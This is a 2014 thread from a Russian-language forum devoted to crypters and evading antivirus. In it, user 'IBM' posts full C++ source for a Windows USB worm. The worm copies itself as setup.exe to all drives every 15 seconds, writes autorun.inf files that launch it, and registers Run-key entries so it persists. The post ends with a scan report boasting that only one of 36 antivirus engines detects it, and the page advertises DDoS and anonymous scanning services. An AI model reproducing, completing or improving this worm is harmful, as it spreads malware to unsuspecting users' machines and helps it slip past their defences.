FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  
Перезагрузить страницу [C++] USB червь
Регистрация Чат + статистика Пользователи Поиск Сообщения за день Все разделы прочитаны

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Prev Предыдущее сообщение   Следующее сообщение Next
Старый 27-01-2014   #1
IBM

xor esp, esp
 
Аватар для IBM

Последняя активность:
1 день назад
Регистрация: 30.11.2013
Сообщений: 76
Поблагодарили всего: 160
за это сообщение: 2
Jabber [email protected]
По умолчанию [C++] USB червь
Код:
#include <windows.h>
#include "stdio.h"

HKEY key;
int count = 0;
char scount[3];

char selfPath[MAX_PATH]; 


void GetAll()
  {
    GetModuleFileName(0, selfPath, sizeof(selfPath));
  }
void InfectDisk(LPCTSTR autopath)
  {
    count++;
    char drive[3];
    char target[MAX_PATH];
    char name[24];
    _splitpath(autopath, drive, 0, 0, 0);
    FILE *file=fopen(autopath, "w");
    fprintf(file, "[autorun]\nOpen=setup.exe\n");
    fprintf(file, "icon=%%SystemRoot%%\\system32\\SHELL32.dll,4\n");
    fprintf(file, "action=Open folder to view files\n");
    fprintf(file, "shell\\open=Open\n");
    fprintf(file, "shell\\open\\command=setup.exe\n");
    fprintf(file, "shell\\open\\default=1\n");
    fclose(file);       
    strcpy(target, drive);
    strcat(target, "\\");
    strcat(target, "setup.exe");
    RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
    strcpy(name, "update_");
    itoa(count, scount, 10);
    strcat(name, scount);
    RegSetValueEx(key,name,0,REG_SZ,(BYTE *)target,sizeof(target));
    RegCloseKey(key); 
    CopyFile(selfPath, target, true); 
  }

int main()
  {
    GetAll();
    for(;;)
      {
        char buf[26];
        const char *inffile = "autorun.inf"; 
        char *sname;
        GetLogicalDriveStringsA(sizeof(buf), buf);
        for (char *s = buf; *s; s+=strlen(s)+1) 
          {
            strcpy(sname, s);
            strcat(sname, inffile);    
            InfectDisk(sname);
          }
        count = 0;
        Sleep(15000);
      }  
  }
И так, червь копируется на все диски каждые 15 секунд с именем setup.exe

Так же на каждом диске, каждые 15 секунд создает autorun.inf с содержимым:

Код:
[autorun]
Open=setup.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=setup.exe
shell\open\default=1


Автозапуск с помощью HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

Имя ключа update_%номер записи%
Значением является путь до каждой копии на зараженных дисках.

номер записи является от единицы и до количества зараженных дисков.

Детект:

Название файла: main.exe
Размер файла: 21090 байт
Дата сканирования: Mon, 27 Jan 14 13:44:54 -0500
MD5-хэш файла: f075167cbee9547e7f5a97c6480fe02c

Результат: 1 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Worm:Win32/Autorun.gen!BT
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru

Если ваш ник Mr.Burns:

Скрытый текст


Закрой вкладку и не ной.
IBM вне форума  
Сказали спасибо:
by_dmr (02-02-2014), POCT (27-01-2014)
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
autorun, char, count, drive, file, setup, target, wsprintf, папки, сделать, червь

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра
Древовидный вид Древовидный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi] Червь с использованием криптографии IBM Pascal/Delphi 0 10-12-2013 19:56
Червь на ассемблере [FASM] IBM Assembler 0 10-12-2013 19:10
Нужен червь kxp Помощь 2 14-11-2013 21:11
Червь W32/Fizzer-mm Andres N. Корзина 1 10-01-2011 19:07

Часовой пояс GMT +3, время: 03:53.


Обратная связь - FuckAV (ФакАВ) - Архив - Вверх

Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров